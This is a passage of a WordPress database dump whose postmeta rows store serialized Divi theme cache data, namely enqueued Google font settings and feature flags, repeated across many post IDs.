";a:0:{}}'),(32835,665,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32836,1170,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32837,1170,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32838,1170,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32828,1000,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32829,1000,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32830,1000,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32831,1000,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32824,1049,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32825,1049,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32826,1049,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32827,1049,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32820,1353,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32821,1353,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32822,1353,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32823,1353,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32816,1512,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32817,1512,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32818,1512,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32819,1512,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32815,1126,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32812,1126,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32813,1126,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32814,1126,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32807,642,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32808,1660,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32809,1660,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32810,1660,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32811,1660,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32803,1122,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32804,642,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32805,642,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32806,642,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32799,1643,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32800,1122,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32801,1122,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32802,1122,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32792,1096,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32793,1096,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32794,1096,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32795,1096,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32796,1643,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32797,1643,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32798,1643,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32787,1549,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32788,1044,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32789,1044,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32790,1044,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32791,1044,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32783,1068,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32784,1549,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32785,1549,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32786,1549,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32779,1099,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,